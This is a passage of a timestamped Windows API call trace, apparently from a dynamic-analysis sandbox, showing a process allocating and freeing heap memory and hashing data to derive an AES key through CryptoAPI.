RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0328 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0117.098] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0117.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0508 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0117.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43caef8 [0117.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caef8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0710 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0117.099] CryptHashData (hHash=0x41ac700, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0117.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0117.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0117.101] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0508 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0117.101] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf10 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0117.101] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0117.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0620 [0117.102] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae20 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0117.102] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0117.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0117.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0530 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0117.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0117.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43cafb8 [0117.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cafb8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0738 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0117.104] CryptDeriveKey (in: hProv=0x41a4150, Algid=0x6610, hBaseData=0x41ac700, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac740) returned 1 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0117.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0117.104] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0117.104] CryptDestroyHash (hHash=0x41ac700) returned 1 [0117.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0117.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0117.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0440 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0117.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0117.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0117.106] 